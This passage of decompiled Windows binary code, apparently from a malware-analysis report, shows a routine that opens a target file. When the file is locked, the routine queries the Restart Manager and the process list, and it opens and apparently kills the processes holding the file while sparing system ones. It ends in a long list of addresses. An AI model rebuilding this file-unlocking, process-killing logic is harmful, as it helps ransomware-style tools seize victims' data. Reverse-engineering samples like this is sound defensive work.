                                                                    										}
                                                                    										_t546 = _v296;
                                                                    										L68:
                                                                    										__eflags = _t546 - 3;
                                                                    										if(__eflags >= 0) {
                                                                    											L75:
                                                                    											if(__eflags == 0) {
                                                                    												goto L98;
                                                                    											}
                                                                    											_push(0x29c);
                                                                    											_v280 = 1;
                                                                    											_v276 = 1;
                                                                    											_v140 = 0;
                                                                    											_t341 = E00EAEBCD();
                                                                    											_t566 = _t564 + 4;
                                                                    											_v264 = _t341;
                                                                    											_v296 = 0;
                                                                    											while(1) {
                                                                    												_v124 = 1;
                                                                    												_v292 =  &_v124;
                                                                    												_v288 =  &_v140;
                                                                    												_v284 =  &_v264;
                                                                    												_v268 =  &_v276;
                                                                    												_v272 =  &_v280;
                                                                    												_v136 = _v128;
                                                                    												_v336 =  &_v96;
                                                                    												_v332 =  &_v136;
                                                                    												_v328 =  &_v272;
                                                                    												_v324 =  &_v268;
                                                                    												_v320 =  &_v284;
                                                                    												_v316 =  &_v288;
                                                                    												_v312 =  &_v292;
                                                                    												_v89 = 0;
                                                                    												_v308 =  &_v89;
                                                                    												_v224 = 0;
                                                                    												_v8 = 0xa;
                                                                    												_t357 =  &_v260;
                                                                    												asm("movups xmm0, [ebp-0x14c]");
                                                                    												_v260 = 0xed9bf8;
                                                                    												_v224 = _t357;
                                                                    												asm("movups [ebp-0xfc], xmm0");
                                                                    												asm("movups xmm0, [ebp-0x13c]");
                                                                    												asm("movups [ebp-0xec], xmm0");
                                                                    												_v8 = 0xb;
                                                                    												_v120 = _t357;
                                                                    												SetEvent(_v104);
                                                                    												_t359 = WaitForSingleObject(_v116, 0x514);
                                                                    												__eflags = _t359 - 0x102;
                                                                    												if(_t359 != 0x102) {
                                                                    													goto L82;
                                                                    												}
                                                                    												_t546 =  *0xf2c29c;
                                                                    												_t473 =  *0xf2c29c;
                                                                    												 *0xecd328();
                                                                    												NtTerminateThread(_v112, 0x14d);
                                                                    												CloseHandle(_v112);
                                                                    												_v112 = 0;
                                                                    												do {
                                                                    													_t391 = CreateThread(0, 0x40000, E00E841F0,  &_v120, 0, 0);
                                                                    													_v112 = _t391;
                                                                    													__eflags = _t391;
                                                                    												} while (_t391 == 0);
                                                                    												ResetEvent(_v116);
                                                                    												ResetEvent(_v104);
                                                                    												_v120 = 0;
                                                                    												_v8 = 1;
                                                                    												_t539 = _v224;
                                                                    												__eflags = _t539;
                                                                    												if(_t539 != 0) {
                                                                    													_t546 =  *( *_t539 + 0x10);
                                                                    													_t395 =  &_v260;
                                                                    													__eflags = _t539 - _t395;
                                                                    													 *0xecd328(_t395 & 0xffffff00 | _t539 != _t395);
                                                                    													_t473 = _t539;
                                                                    													 *( *( *_t539 + 0x10))();
                                                                    													_v224 = 0;
                                                                    												}
                                                                    												L86:
                                                                    												_t534 = _v296;
                                                                    												__eflags = _v296 - 3;
                                                                    												if(__eflags >= 0) {
                                                                    													L92:
                                                                    													if(__eflags != 0) {
                                                                    														_t361 = _v276;
                                                                    														__eflags = _t361;
                                                                    														if(__eflags != 0) {
                                                                    															_push( ~(__eflags > 0) | _t361 * 0x00000004);
                                                                    															_t548 = E00EA76E3(_t470, _t361 * 4 >> 0x20, _t534, _t546, __eflags);
                                                                    															E00E86270(_t470,  &_v120, __imp__RmEndSession, _t534, _t548,  ~(__eflags > 0) | _t361 * 0x00000004, _v128);
                                                                    															_t521 = _v276;
                                                                    															_t485 = 0;
                                                                    															__eflags = _t521;
                                                                    															if(_t521 == 0) {
                                                                    																L102:
                                                                    																E00E84460( &_v120, _t548, _t521, _v300, _v304);
                                                                    																L00EA7E60(_t548);
                                                                    																E00EAEBD8(_v264);
                                                                    																goto L103;
                                                                    															}
                                                                    															do {
                                                                    																 *((intOrPtr*)(_t548 + _t485 * 4)) =  *_v264;
                                                                    																_t485 = _t485 + 1;
                                                                    																_t521 = _v276;
                                                                    																__eflags = _t485 - _t521;
                                                                    															} while (_t485 < _t521);
                                                                    															goto L102;
                                                                    														}
                                                                    														E00EAEBD8(_v264);
                                                                    														_t564 = _t566 + 4;
                                                                    														goto L98;
                                                                    													}
                                                                    													E00EAEBD8(_v264);
                                                                    													E00E86270(_t470,  &_v120, __imp__RmEndSession, _t534, _t546, _t473, _v128);
                                                                    													_v132 = 0;
                                                                    													_t373 = E00EAEBCD();
                                                                    													_t571 = _t566 + 0x10;
                                                                    													_t537 = _t373;
                                                                    													__imp__EnumProcesses(_t537, 0x320,  &_v132, 0x320);
                                                                    													_t488 = _v132;
                                                                    													__eflags = _t488 - 0x320;
                                                                    													if(_t488 < 0x320) {
                                                                    														L95:
                                                                    														E00E84460( &_v120, _t537, _t488 >> 2, _v300, _v304);
                                                                    														E00EAEBD8(_t537);
                                                                    														goto L103;
                                                                    													} else {
                                                                    														goto L94;
                                                                    													}
                                                                    													do {
                                                                    														L94:
                                                                    														_t549 = _t488 + _t488 * 2;
                                                                    														_t377 = E00EAF132();
                                                                    														_t571 = _t571 + 8;
                                                                    														_t537 = _t377;
                                                                    														__imp__EnumProcesses(_t537, _t549,  &_v132, _t537, _t549);
                                                                    														_t488 = _v132;
                                                                    														__eflags = _t488 - _t549;
                                                                    													} while (_t488 >= _t549);
                                                                    													goto L95;
                                                                    												}
                                                                    												_t379 = _v280;
                                                                    												_t550 = _v264;
                                                                    												_v276 = _t379;
                                                                    												while(1) {
                                                                    													_t473 =  ~(__eflags > 0) | _t379 * 0x0000029c;
                                                                    													_push( ~(__eflags > 0) | _t379 * 0x0000029c);
                                                                    													_push(_t550);
                                                                    													_t546 = E00EAF132();
                                                                    													_t566 = _t566 + 8;
                                                                    													_v264 = _t546;
                                                                    													__eflags = _t546;
                                                                    													if(__eflags != 0) {
                                                                    														break;
                                                                    													}
                                                                    													_t379 = _v280;
                                                                    												}
                                                                    												_v296 = _v296 + 1;
                                                                    												continue;
                                                                    												L82:
                                                                    												_t360 = _v89;
                                                                    												_v100 = _t360;
                                                                    												_v8 = 1;
                                                                    												_t536 = _v224;
                                                                    												__eflags = _t536;
                                                                    												if(_t536 != 0) {
                                                                    													_t546 =  *( *_t536 + 0x10);
                                                                    													_t383 =  &_v260;
                                                                    													__eflags = _t536 - _t383;
                                                                    													_t244 = _t536 != _t383;
                                                                    													__eflags = _t244;
                                                                    													 *0xecd328(_t383 & 0xffffff00 | _t244);
                                                                    													_t473 = _t536;
                                                                    													 *( *( *_t536 + 0x10))();
                                                                    													_t360 = _v100;
                                                                    													_v224 = 0;
                                                                    												}
                                                                    												__eflags = _t360;
                                                                    												if(_t360 != 0) {
                                                                    													__eflags = _v124;
                                                                    													if(_v124 == 0) {
                                                                    														_t534 = _v296;
                                                                    														__eflags = _v296 - 3;
                                                                    														goto L92;
                                                                    													}
                                                                    												}
                                                                    												goto L86;
                                                                    											}
                                                                    										}
                                                                    										_t546 = _t546 + 1;
                                                                    										continue;
                                                                    										L70:
                                                                    										_t340 = _v89;
                                                                    										_v100 = _t340;
                                                                    										_v8 = 1;
                                                                    										_t534 = _v184;
                                                                    										__eflags = _t534;
                                                                    										if(_t534 != 0) {
                                                                    											_t400 =  &_v220;
                                                                    											__eflags = _t534 - _t400;
                                                                    											_t171 = _t534 != _t400;
                                                                    											__eflags = _t171;
                                                                    											 *0xecd328(_t400 & 0xffffff00 | _t171);
                                                                    											_t473 = _t534;
                                                                    											 *((intOrPtr*)( *((intOrPtr*)( *_t534 + 0x10))))();
                                                                    											_t546 = _v296;
                                                                    											_t340 = _v100;
                                                                    											_v184 = 0;
                                                                    										}
                                                                    										__eflags = _t340;
                                                                    										if(_t340 == 0) {
                                                                    											goto L68;
                                                                    										} else {
                                                                    											__eflags = _v124;
                                                                    											if(_v124 != 0) {
                                                                    												goto L68;
                                                                    											}
                                                                    											__eflags = _t546 - 3;
                                                                    											goto L75;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								_t546 = _t546 + 1;
                                                                    								_v296 = _t546;
                                                                    								continue;
                                                                    								L55:
                                                                    								_t324 = _v89;
                                                                    								_v96 = _t324;
                                                                    								_v8 = 1;
                                                                    								_t534 = _v144;
                                                                    								__eflags = _t534;
                                                                    								if(_t534 != 0) {
                                                                    									_t417 =  &_v180;
                                                                    									__eflags = _t534 - _t417;
                                                                    									_t113 = _t534 != _t417;
                                                                    									__eflags = _t113;
                                                                    									 *0xecd328(_t417 & 0xffffff00 | _t113);
                                                                    									_t473 = _t534;
                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *_t534 + 0x10))))();
                                                                    									_t546 = _v296;
                                                                    									_t324 = _v96;
                                                                    									_v144 = 0;
                                                                    								}
                                                                    								__eflags = _t324;
                                                                    								if(_t324 == 0) {
                                                                    									goto L53;
                                                                    								} else {
                                                                    									__eflags = _v124;
                                                                    									if(_v124 != 0) {
                                                                    										goto L53;
                                                                    									}
                                                                    									__eflags = _t546 - 3;
                                                                    									goto L60;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						do {
                                                                    							Sleep(0x50);
                                                                    							_t435 =  *0xf2c2c0; // 0x0
                                                                    							__eflags = _t435 - 0x37;
                                                                    						} while (_t435 > 0x37);
                                                                    						goto L44;
                                                                    					}
                                                                    					_v8 = 0xffffffff;
                                                                    					SetEvent(_v108);
                                                                    					WaitForSingleObject(_v112, 0xffffffff);
                                                                    					CloseHandle(_v108);
                                                                    					CloseHandle(_v104);
                                                                    					CloseHandle(_v116);
                                                                    					CloseHandle(_v112);
                                                                    					goto L105;
                                                                    				}
                                                                    				_t442 = CreateFileW(__ecx, 0x12019f, 0, 0, 3, 0, 0);
                                                                    				 *_v304 = _t442;
                                                                    				if(_t442 == 0xffffffff) {
                                                                    					_t501 = _t533;
                                                                    					_t526 =  &(_t501[1]);
                                                                    					do {
                                                                    						_t443 =  *_t501;
                                                                    						_t501 =  &(_t501[1]);
                                                                    						__eflags = _t443;
                                                                    					} while (_t443 != 0);
                                                                    					_t503 = _t501 - _t526 >> 1;
                                                                    					__eflags = _t501 - _t526 >> 1 - 8;
                                                                    					if(_t501 - _t526 >> 1 < 8) {
                                                                    						goto L104;
                                                                    					}
                                                                    					_t557 =  &(_t533[4]);
                                                                    					_t444 = E00EB093E(_t557, L"UNC", 3);
                                                                    					_t573 = _t563 + 0xc;
                                                                    					__eflags = _t444;
                                                                    					if(_t444 != 0) {
                                                                    						_t558 =  &(_t557[3]);
                                                                    						__eflags =  &(_t557[3]);
                                                                    					} else {
                                                                    						_t10 =  &(_t557[4]); // 0x8
                                                                    						_push(0x5c);
                                                                    						_t466 = E00EA8EBB(_t503);
                                                                    						_push(0x5c);
                                                                    						_push(_t466 + 2);
                                                                    						_t468 = E00EA8EBB(_t503);
                                                                    						_t573 = _t573 + 0x10;
                                                                    						_t11 = _t468 + 2; // 0x2
                                                                    						_t558 = _t11;
                                                                    					}
                                                                    					_t445 = E00EB0AF3(_t558);
                                                                    					_t527 = _t445;
                                                                    					_v268 = _t445;
                                                                    					_t563 = _t573 + 4;
                                                                    					_t13 = _t527 + 2; // 0x2
                                                                    					_t559 = _t13;
                                                                    					do {
                                                                    						_t504 =  *_t527;
                                                                    						_t527 = _t527 + 2;
                                                                    						__eflags = _t504;
                                                                    					} while (_t504 != 0);
                                                                    					_t560 =  *0xf2c288; // 0x88efc0
                                                                    					_t529 = _t527 - _t559 >> 1;
                                                                    					_v296 = _t529;
                                                                    					__eflags = _t560 -  *0xf2c28c; // 0x890de4
                                                                    					if(__eflags == 0) {
                                                                    						goto L39;
                                                                    					}
                                                                    					do {
                                                                    						_t505 =  *_t560;
                                                                    						_t540 = _t505 + 2;
                                                                    						do {
                                                                    							_t446 =  *_t505;
                                                                    							_t505 = _t505 + 2;
                                                                    							__eflags = _t446;
                                                                    						} while (_t446 != 0);
                                                                    						_t507 = _t505 - _t540 >> 1;
                                                                    						__eflags = _t507 - _t529;
                                                                    						if(_t507 < _t529) {
                                                                    							L37:
                                                                    							_t533 = _v300;
                                                                    							goto L38;
                                                                    						}
                                                                    						_t530 = _v268;
                                                                    						_t509 =  *_t560 + (_t507 - _t529) * 2;
                                                                    						_t542 = _t529 + _t529 - 4;
                                                                    						__eflags = _t542;
                                                                    						if(_t542 < 0) {
                                                                    							L19:
                                                                    							__eflags = _t542 - 0xfffffffc;
                                                                    							if(_t542 == 0xfffffffc) {
                                                                    								L27:
                                                                    								__eflags =  *(_t560 + 8) & 0x00000001;
                                                                    								if(__eflags == 0) {
                                                                    									_t448 = OpenProcess(0x1040, 0,  *(_t560 + 4));
                                                                    									__eflags = _t448 - 0xffffffff;
                                                                    									if(__eflags == 0) {
                                                                    										L36:
                                                                    										_t529 = _v296;
                                                                    										goto L37;
                                                                    									}
                                                                    									_t510 =  *(_t560 + 0xa) & 0x0000ffff;
                                                                    									_push(1);
                                                                    									_push(0);
                                                                    									_push(0);
                                                                    									_push(_t510);
                                                                    									_push(_t448);
                                                                    									_push(_t510);
                                                                    									E00E85D70( &_v120,  *0xf2c278, _t542, _t560, __eflags);
                                                                    									_t533 = _v300;
                                                                    									_t563 = _t563 - 8 + 0x20;
                                                                    									_t450 = CreateFileW(_t533, 0x12019f, 0, 0, 3, 0, 0);
                                                                    									 *_v304 = _t450;
                                                                    									__eflags = _t450 - 0xffffffff;
                                                                    									if(_t450 == 0xffffffff) {
                                                                    										L32:
                                                                    										_t529 = _v296;
                                                                    										goto L38;
                                                                    									}
                                                                    									goto L104;
                                                                    								}
                                                                    								_push(0x322);
                                                                    								_t451 = E00EA76E3(_t470, _t530, _t542, _t560, __eflags);
                                                                    								_t563 = _t563 + 4;
                                                                    								_t543 = _t451;
                                                                    								_v272 = _t543;
                                                                    								_t452 = OpenProcess(0x411, 0,  *(_t560 + 4));
                                                                    								_v132 = _t452;
                                                                    								__eflags = _t452 - 0xffffffff;
                                                                    								if(_t452 == 0xffffffff) {
                                                                    									goto L36;
                                                                    								}
                                                                    								__imp__GetModuleFileNameExW(_t452, 0, _t543, 0x190);
                                                                    								_t453 = E00EB0BE6(_t470, _t543, _t560, L"c:\\windows\\", _t543, 0xb);
                                                                    								_t575 = _t563 + 0xc;
                                                                    								__eflags = _t453;
                                                                    								if(_t453 != 0) {
                                                                    									E00E84260(_t470, _t543, _t543, _t560);
                                                                    									 *0xecd328(_v132, 0);
                                                                    									 *((intOrPtr*)( *0xf2c280))();
                                                                    									_t543 = _v272;
                                                                    								}
                                                                    								CloseHandle(_v132);
                                                                    								L00EA7E60(_t543);
                                                                    								_t533 = _v300;
                                                                    								_t563 = _t575 + 4;
                                                                    								_t456 = CreateFileW(_t533, 0x12019f, 0, 0, 3, 0, 0);
                                                                    								 *_v304 = _t456;
                                                                    								__eflags = _t456 - 0xffffffff;
                                                                    								if(_t456 != 0xffffffff) {
                                                                    									goto L104;
                                                                    								} else {
                                                                    									goto L32;
                                                                    								}
                                                                    							}
                                                                    							L20:
                                                                    							__eflags =  *_t509 -  *_t530;
                                                                    							if( *_t509 !=  *_t530) {
                                                                    								goto L36;
                                                                    							}
                                                                    							__eflags = _t542 - 0xfffffffd;
                                                                    							if(_t542 == 0xfffffffd) {
                                                                    								goto L27;
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(_t509 + 1)) -  *((intOrPtr*)(_t530 + 1));
                                                                    							if( *((intOrPtr*)(_t509 + 1)) !=  *((intOrPtr*)(_t530 + 1))) {
                                                                    								goto L36;
                                                                    							}
                                                                    							__eflags = _t542 - 0xfffffffe;
                                                                    							if(_t542 == 0xfffffffe) {
                                                                    								goto L27;
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(_t509 + 2)) -  *((intOrPtr*)(_t530 + 2));
                                                                    							if( *((intOrPtr*)(_t509 + 2)) !=  *((intOrPtr*)(_t530 + 2))) {
                                                                    								goto L36;
                                                                    							}
                                                                    							__eflags = _t542 - 0xffffffff;
                                                                    							if(_t542 == 0xffffffff) {
                                                                    								goto L27;
                                                                    							}
                                                                    							__eflags =  *((intOrPtr*)(_t509 + 3)) -  *((intOrPtr*)(_t530 + 3));
                                                                    							if( *((intOrPtr*)(_t509 + 3)) !=  *((intOrPtr*)(_t530 + 3))) {
                                                                    								goto L36;
                                                                    							}
                                                                    							goto L27;
                                                                    						} else {
                                                                    							goto L17;
                                                                    						}
                                                                    						while(1) {
                                                                    							L17:
                                                                    							__eflags =  *_t509 -  *_t530;
                                                                    							if( *_t509 !=  *_t530) {
                                                                    								goto L20;
                                                                    							}
                                                                    							_t509 = _t509 + 4;
                                                                    							_t530 = _t530 + 4;
                                                                    							_t542 = _t542 - 4;
                                                                    							__eflags = _t542;
                                                                    							if(_t542 >= 0) {
                                                                    								continue;
                                                                    							}
                                                                    							goto L19;
                                                                    						}
                                                                    						goto L20;
                                                                    						L38:
                                                                    						_t560 = _t560 + 0xc;
                                                                    						__eflags = _t560 -  *0xf2c28c; // 0x890de4
                                                                    					} while (__eflags != 0);
                                                                    					goto L39;
                                                                    				}
                                                                    				CloseHandle(_t442);
                                                                    				goto L39;
                                                                    			}




























































































































                                                                    0x00e84b50
                                                                    0x00e84b53
                                                                    0x00e84b55
                                                                    0x00e84b60
                                                                    0x00e84b61
                                                                    0x00e84b67
                                                                    0x00e84b6c
                                                                    0x00e84b6e
                                                                    0x00e84b71
                                                                    0x00e84b72
                                                                    0x00e84b73
                                                                    0x00e84b77
                                                                    0x00e84b7d
                                                                    0x00e84b83
                                                                    0x00e84b85
                                                                    0x00e84b8e
                                                                    0x00e84b93
                                                                    0x00e84ba1
                                                                    0x00e84e3a
                                                                    0x00e84e4a
                                                                    0x00e84e50
                                                                    0x00e84e56
                                                                    0x00e84e5b
                                                                    0x00e84ea1
                                                                    0x00e84ea6
                                                                    0x00e84ea9
                                                                    0x00e84ec2
                                                                    0x00e84ec2
                                                                    0x00e84ec9
                                                                    0x00e84ecd
                                                                    0x00e84ed4
                                                                    0x00e84edd
                                                                    0x00e84ee4
                                                                    0x00e84eea
                                                                    0x00e84eef
                                                                    0x00e84ef2
                                                                    0x00e84ef5
                                                                    0x00e84efd
                                                                    0x00e84efd
                                                                    0x00e84f03
                                                                    0x00e84f05
                                                                    0x00e84f10
                                                                    0x00e84f13
                                                                    0x00e84f17
                                                                    0x00e84f20
                                                                    0x00e84f29
                                                                    0x00e84f32
                                                                    0x00e84f38
                                                                    0x00e84f44
                                                                    0x00e84f50
                                                                    0x00e84f5c
                                                                    0x00e84f65
                                                                    0x00e84f6f
                                                                    0x00e84f73
                                                                    0x00e84f7a
                                                                    0x00e84f80
                                                                    0x00e84f86
                                                                    0x00e84f90
                                                                    0x00e84f97
                                                                    0x00e84f9d
                                                                    0x00e84fa4
                                                                    0x00e84fa7
                                                                    0x00e84fb5
                                                                    0x00e84fbb
                                                                    0x00e84fc0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84fcc
                                                                    0x00e84fd6
                                                                    0x00e84fdc
                                                                    0x00e84fe1
                                                                    0x00e84fe7
                                                                    0x00e84ff0
                                                                    0x00e85004
                                                                    0x00e8500a
                                                                    0x00e8500d
                                                                    0x00e8500d
                                                                    0x00e85014
                                                                    0x00e8501d
                                                                    0x00e85023
                                                                    0x00e8502a
                                                                    0x00e8502e
                                                                    0x00e85034
                                                                    0x00e85036
                                                                    0x00e8503d
                                                                    0x00e85043
                                                                    0x00e85047
                                                                    0x00e85047
                                                                    0x00e8504b
                                                                    0x00e85051
                                                                    0x00e85053
                                                                    0x00e85055
                                                                    0x00e85055
                                                                    0x00e8505f
                                                                    0x00e85065
                                                                    0x00e85065
                                                                    0x00e85068
                                                                    0x00e850c7
                                                                    0x00e850c7
                                                                    0x00e855e6
                                                                    0x00e855f3
                                                                    0x00e85681
                                                                    0x00e85681
                                                                    0x00e85685
                                                                    0x00e8568c
                                                                    0x00e8568c
                                                                    0x00e85696
                                                                    0x00e8569b
                                                                    0x00e8569e
                                                                    0x00e856b5
                                                                    0x00e856b5
                                                                    0x00e850cd
                                                                    0x00e850cd
                                                                    0x00e850cf
                                                                    0x00e850d6
                                                                    0x00e850d9
                                                                    0x00e850df
                                                                    0x00e850eb
                                                                    0x00e850f4
                                                                    0x00e85103
                                                                    0x00e8510f
                                                                    0x00e8511b
                                                                    0x00e85127
                                                                    0x00e85130
                                                                    0x00e85134
                                                                    0x00e8513e
                                                                    0x00e85142
                                                                    0x00e85149
                                                                    0x00e8514f
                                                                    0x00e85155
                                                                    0x00e8515f
                                                                    0x00e85166
                                                                    0x00e8516c
                                                                    0x00e85173
                                                                    0x00e85176
                                                                    0x00e85184
                                                                    0x00e8518a
                                                                    0x00e8518f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e8519b
                                                                    0x00e851a5
                                                                    0x00e851ab
                                                                    0x00e851b0
                                                                    0x00e851b6
                                                                    0x00e851c0
                                                                    0x00e851d4
                                                                    0x00e851da
                                                                    0x00e851dd
                                                                    0x00e851dd
                                                                    0x00e851e4
                                                                    0x00e851ed
                                                                    0x00e851f3
                                                                    0x00e851fa
                                                                    0x00e851fe
                                                                    0x00e85204
                                                                    0x00e85206
                                                                    0x00e8520d
                                                                    0x00e85213
                                                                    0x00e85217
                                                                    0x00e85217
                                                                    0x00e8521b
                                                                    0x00e85221
                                                                    0x00e85223
                                                                    0x00e85225
                                                                    0x00e85225
                                                                    0x00e8522f
                                                                    0x00e85235
                                                                    0x00e85235
                                                                    0x00e85238
                                                                    0x00e85291
                                                                    0x00e85291
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e85297
                                                                    0x00e8529c
                                                                    0x00e852a6
                                                                    0x00e852b0
                                                                    0x00e852ba
                                                                    0x00e852bf
                                                                    0x00e852c2
                                                                    0x00e852c8
                                                                    0x00e852d2
                                                                    0x00e852d5
                                                                    0x00e852dc
                                                                    0x00e852e8
                                                                    0x00e852f4
                                                                    0x00e85300
                                                                    0x00e8530c
                                                                    0x00e85315
                                                                    0x00e85324
                                                                    0x00e85330
                                                                    0x00e8533c
                                                                    0x00e85348
                                                                    0x00e85354
                                                                    0x00e85360
                                                                    0x00e8536c
                                                                    0x00e85375
                                                                    0x00e85379
                                                                    0x00e8537f
                                                                    0x00e85389
                                                                    0x00e8538d
                                                                    0x00e85393
                                                                    0x00e8539a
                                                                    0x00e853a4
                                                                    0x00e853aa
                                                                    0x00e853b1
                                                                    0x00e853b8
                                                                    0x00e853bf
                                                                    0x00e853c6
                                                                    0x00e853c9
                                                                    0x00e853d7
                                                                    0x00e853dd
                                                                    0x00e853e2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e853e8
                                                                    0x00e853ee
                                                                    0x00e853f8
                                                                    0x00e853fe
                                                                    0x00e85403
                                                                    0x00e85409
                                                                    0x00e85410
                                                                    0x00e85424
                                                                    0x00e8542a
                                                                    0x00e8542d
                                                                    0x00e8542d
                                                                    0x00e85434
                                                                    0x00e8543d
                                                                    0x00e85443
                                                                    0x00e8544a
                                                                    0x00e8544e
                                                                    0x00e85454
                                                                    0x00e85456
                                                                    0x00e8545a
                                                                    0x00e8545d
                                                                    0x00e85463
                                                                    0x00e8546b
                                                                    0x00e85471
                                                                    0x00e85473
                                                                    0x00e85475
                                                                    0x00e85475
                                                                    0x00e854c9
                                                                    0x00e854c9
                                                                    0x00e854cf
                                                                    0x00e854d2
                                                                    0x00e8552d
                                                                    0x00e8552d
                                                                    0x00e855ce
                                                                    0x00e855d4
                                                                    0x00e855d6
                                                                    0x00e85610
                                                                    0x00e8561f
                                                                    0x00e85628
                                                                    0x00e8562d
                                                                    0x00e85636
                                                                    0x00e85638
                                                                    0x00e8563a
                                                                    0x00e85656
                                                                    0x00e85668
                                                                    0x00e8566e
                                                                    0x00e85679
                                                                    0x00000000
                                                                    0x00e8567e
                                                                    0x00e85640
                                                                    0x00e85648
                                                                    0x00e8564b
                                                                    0x00e8564c
                                                                    0x00e85652
                                                                    0x00e85652
                                                                    0x00000000
                                                                    0x00e85640
                                                                    0x00e855de
                                                                    0x00e855e3
                                                                    0x00000000
                                                                    0x00e855e3
                                                                    0x00e85539
                                                                    0x00e8554e
                                                                    0x00e85558
                                                                    0x00e8555f
                                                                    0x00e85564
                                                                    0x00e85567
                                                                    0x00e85573
                                                                    0x00e85579
                                                                    0x00e8557c
                                                                    0x00e85582
                                                                    0x00e855a6
                                                                    0x00e855bb
                                                                    0x00e855c1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e85584
                                                                    0x00e85584
                                                                    0x00e85584
                                                                    0x00e85589
                                                                    0x00e8558e
                                                                    0x00e85591
                                                                    0x00e85599
                                                                    0x00e8559f
                                                                    0x00e855a2
                                                                    0x00e855a2
                                                                    0x00000000
                                                                    0x00e85584
                                                                    0x00e854d4
                                                                    0x00e854df
                                                                    0x00e854e5
                                                                    0x00e854f0
                                                                    0x00e854f9
                                                                    0x00e854fb
                                                                    0x00e854fc
                                                                    0x00e85502
                                                                    0x00e85504
                                                                    0x00e85507
                                                                    0x00e8550d
                                                                    0x00e8550f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e85511
                                                                    0x00e85511
                                                                    0x00e85519
                                                                    0x00000000
                                                                    0x00e85481
                                                                    0x00e85481
                                                                    0x00e85484
                                                                    0x00e85487
                                                                    0x00e8548b
                                                                    0x00e85491
                                                                    0x00e85493
                                                                    0x00e85497
                                                                    0x00e8549a
                                                                    0x00e854a0
                                                                    0x00e854a4
                                                                    0x00e854a4
                                                                    0x00e854a8
                                                                    0x00e854ae
                                                                    0x00e854b0
                                                                    0x00e854b2
                                                                    0x00e854b5
                                                                    0x00e854b5
                                                                    0x00e854bf
                                                                    0x00e854c1
                                                                    0x00e854c3
                                                                    0x00e854c7
                                                                    0x00e85524
                                                                    0x00e8552a
                                                                    0x00000000
                                                                    0x00e8552a
                                                                    0x00e854c7
                                                                    0x00000000
                                                                    0x00e854c1
                                                                    0x00e852d2
                                                                    0x00e8523a
                                                                    0x00000000
                                                                    0x00e85240
                                                                    0x00e85240
                                                                    0x00e85243
                                                                    0x00e85246
                                                                    0x00e8524a
                                                                    0x00e85250
                                                                    0x00e85252
                                                                    0x00e85259
                                                                    0x00e8525f
                                                                    0x00e85263
                                                                    0x00e85263
                                                                    0x00e85267
                                                                    0x00e8526d
                                                                    0x00e8526f
                                                                    0x00e85271
                                                                    0x00e85277
                                                                    0x00e8527a
                                                                    0x00e8527a
                                                                    0x00e85284
                                                                    0x00e85286
                                                                    0x00000000
                                                                    0x00e85288
                                                                    0x00e85288
                                                                    0x00e8528c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e8528e
                                                                    0x00000000
                                                                    0x00e8528e
                                                                    0x00e85286
                                                                    0x00e850d6
                                                                    0x00e8506a
                                                                    0x00e8506b
                                                                    0x00000000
                                                                    0x00e85076
                                                                    0x00e85076
                                                                    0x00e85079
                                                                    0x00e8507c
                                                                    0x00e85080
                                                                    0x00e85086
                                                                    0x00e85088
                                                                    0x00e8508f
                                                                    0x00e85095
                                                                    0x00e85099
                                                                    0x00e85099
                                                                    0x00e8509d
                                                                    0x00e850a3
                                                                    0x00e850a5
                                                                    0x00e850a7
                                                                    0x00e850ad
                                                                    0x00e850b0
                                                                    0x00e850b0
                                                                    0x00e850ba
                                                                    0x00e850bc
                                                                    0x00000000
                                                                    0x00e850be
                                                                    0x00e850be
                                                                    0x00e850c2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e850c4
                                                                    0x00000000
                                                                    0x00e850c4
                                                                    0x00e850bc
                                                                    0x00e84f10
                                                                    0x00e84eb0
                                                                    0x00e84eb2
                                                                    0x00e84eb8
                                                                    0x00e84ebd
                                                                    0x00e84ebd
                                                                    0x00000000
                                                                    0x00e84eb0
                                                                    0x00e84e5d
                                                                    0x00e84e67
                                                                    0x00e84e72
                                                                    0x00e84e7b
                                                                    0x00e84e84
                                                                    0x00e84e8d
                                                                    0x00e84e96
                                                                    0x00000000
                                                                    0x00e84e96
                                                                    0x00e84bb7
                                                                    0x00e84bc3
                                                                    0x00e84bc8
                                                                    0x00e84bd6
                                                                    0x00e84bd8
                                                                    0x00e84be0
                                                                    0x00e84be0
                                                                    0x00e84be3
                                                                    0x00e84be6
                                                                    0x00e84be6
                                                                    0x00e84bed
                                                                    0x00e84bef
                                                                    0x00e84bf2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84bfa
                                                                    0x00e84c03
                                                                    0x00e84c08
                                                                    0x00e84c0b
                                                                    0x00e84c0d
                                                                    0x00e84c2d
                                                                    0x00e84c2d
                                                                    0x00e84c0f
                                                                    0x00e84c0f
                                                                    0x00e84c12
                                                                    0x00e84c15
                                                                    0x00e84c1d
                                                                    0x00e84c1f
                                                                    0x00e84c20
                                                                    0x00e84c25
                                                                    0x00e84c28
                                                                    0x00e84c28
                                                                    0x00e84c28
                                                                    0x00e84c31
                                                                    0x00e84c36
                                                                    0x00e84c38
                                                                    0x00e84c3e
                                                                    0x00e84c41
                                                                    0x00e84c41
                                                                    0x00e84c44
                                                                    0x00e84c44
                                                                    0x00e84c47
                                                                    0x00e84c4a
                                                                    0x00e84c4a
                                                                    0x00e84c51
                                                                    0x00e84c57
                                                                    0x00e84c59
                                                                    0x00e84c5f
                                                                    0x00e84c65
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e84c70
                                                                    0x00e84c70
                                                                    0x00e84c72
                                                                    0x00e84c75
                                                                    0x00e84c75
                                                                    0x00e84c78
                                                                    0x00e84c7b
                                                                    0x00e84c7b
                                                                    0x00e84c82
                                                                    0x00e84c84
                                                                    0x00e84c86
                                                                    0x00e84e25
                                                                    0x00e84e25
                                                                    0x00000000
                                                                    0x00e84e25
                                                                    0x00e84c93
                                                                    0x00e84c99
                                                                    0x00e84c9c
                                                                    0x00e84c9c
                                                                    0x00e84c9f
                                                                    0x00e84cb2
